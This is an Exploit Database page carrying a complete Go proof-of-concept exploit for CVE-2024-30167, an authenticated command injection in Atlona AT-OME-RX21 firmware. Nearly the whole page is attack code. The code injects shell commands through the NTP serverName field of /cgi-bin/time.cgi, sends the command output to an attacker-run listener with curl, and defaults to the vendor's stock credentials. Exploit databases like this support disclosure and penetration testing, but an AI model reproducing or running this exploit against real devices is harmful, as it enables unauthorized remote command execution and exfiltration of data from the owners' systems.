This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Atlona ATOMERX21 - Authenticated Command Injection EDB-ID: 52513 CVE: 2024-30167 EDB Verified: Author: RIZZZIOM Type: LOCAL Exploit: / Platform: MULTIPLE Date: 2026-04-29 Vulnerable App: // Exploit Title: Atlona AT-OME-RX21 Authenticated Command Injection // Google Dork: N/A // Date: 2025-12-28 // Exploit Author: RIZZZIOM // Vendor Homepage: https://atlona.com // Software Link: https://atlona.com/product/at-ome-rx21/ // Version: Firmware <= 1.5.1 // Tested on: AT-OME-RX21 Embedded Firmware (1.5.0, 1.5.1) // CVE : CVE-2024-30167 // Usage: go run main.go -t <target_uri> -u <username> -p <password> -l <lhost> -P <lport> -c <command> package main import ( "bytes" "context" "encoding/base64" "flag" "fmt" "io" "net/http" "os" "os/signal" "strings" "syscall" "time" ) func main() { banner := ` ▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████ ██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀ ▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀ PoC by: github.com/RIZZZIOM ` fmt.Println(banner) target := flag.String("t", "", "Target URL (e.g: http://example.com)") username := flag.String("u", "admin", "Username for authentication") password := flag.String("p", "Atlona", "Password for authentication") lport := flag.String("P", "4444", "listening port for command output") lhost := flag.String("l", "", "listening host for command output") command := flag.String("c", "", "Command to execute on the target") flag.Parse() if *target == "" || *lhost == "" || *command == "" { fmt.Println("ERROR: Missing required parameters") flag.PrintDefaults() os.Exit(1) } url := strings.TrimRight(*target, "/") + "/cgi-bin/time.cgi" listener := *lhost + ":" + *lport // Buffered channel to prevent goroutine blocking if receiver exits early responseChan := make(chan struct{}, 1) // Create context for graceful shutdown coordination ctx, cancel := context.WithCancel(context.Background()) defer cancel() // Start HTTP server and get reference for shutdown server := httpServe(listener, responseChan, ctx) executeCommand(url, *username, *password, listener, *command) sigChan := make(chan os.Signal, 1) signal.Notify(sigChan, syscall.SIGINT, syscall.SIGTERM) // Timeout to prevent indefinite waiting responseTimeout := time.NewTimer(30 * time.Second) defer responseTimeout.Stop() select { case <-responseChan: time.Sleep(1 * time.Second) case <-sigChan: fmt.Printf("\n===Shutting Down===\n") case <-responseTimeout.C: fmt.Println("\n===Response Timeout - No response received===") } // Graceful server shutdown cancel() // Signal context cancellation shutdownCtx, shutdownCancel := context.WithTimeout(context.Background(), 5*time.Second) defer shutdownCancel() if err := server.Shutdown(shutdownCtx); err != nil { fmt.Printf("Server shutdown error: %v\n", err) } } func executeCommand(url, username, password, listener, command string) { // this func sends the commands to the target payload := fmt.Sprintf(`{"syncSntpTime":{"serverName":"time.google.com; curl -X POST --data \"$(%s)\" %s"}}`, command, listener) auth := base64.StdEncoding.EncodeToString([]byte(username + ":" + password)) req, err := http.NewRequest("POST", url, bytes.NewBuffer([]byte(payload))) if err != nil { panic(err) } req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0) Firefox/143.0") req.Header.Set("Content-Type", "application/json") req.Header.Set("Authorization", "Basic "+auth) req.Header.Set("X-Requested-With", "XMLHttpRequest") client := &http.Client{ Timeout: 15 * time.Second, } resp, err := client.Do(req) if err != nil { fmt.Printf("ERROR: Request failed: %v\n", err) os.Exit(1) } defer resp.Body.Close() switch resp.StatusCode { case 200: fmt.Println("Command Injection Successful") case 401, 403: fmt.Printf("ERROR: Authentication Failed (HTTP %d)\n", resp.StatusCode) case 404: fmt.Printf("ERROR: Target Endpoint Not Found.\n") default: fmt.Printf("ERROR: Unexpected Response (HTTP %d)\n", resp.StatusCode) body, _ := io.ReadAll(resp.Body) if len(body) > 0 { fmt.Printf("Response Body: %s\n", string(body)) } os.Exit(1) } } func getResponse(r *http.Request, responseChan chan struct{}) { // this function serves and http server and collects response if r.Method != http.MethodPost { fmt.Printf("Received non-POST Request(%s)\n", r.Method) return } defer r.Body.Close() fmt.Println("\n=====Received Response=====") body, err := io.ReadAll(r.Body) if err != nil { fmt.Printf("Failed To Read Response Body: %v\n", err) return } fmt.Println(string(body)) // Non-blocking send to prevent goroutine deadlock select { case responseChan <- struct{}{}: default: } } func httpServe(listener string, responseChan chan struct{}, ctx context.Context) *http.Server { // this function gets the command injection response from the custom header mux := http.NewServeMux() mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) { getResponse(r, responseChan) w.WriteHeader(http.StatusNoContent) }) server := &http.Server{ Addr: listener, Handler: mux, MaxHeaderBytes: 20 * 1024 * 1024, ReadTimeout: 30 * time.Second, WriteTimeout: 30 * time.Second, IdleTimeout: 60 * time.Second, } fmt.Printf("Listening on %s for response...\n", listener) go func() { if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed { fmt.Printf("ERROR: Server error: %v\n", err) } }() return server } Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.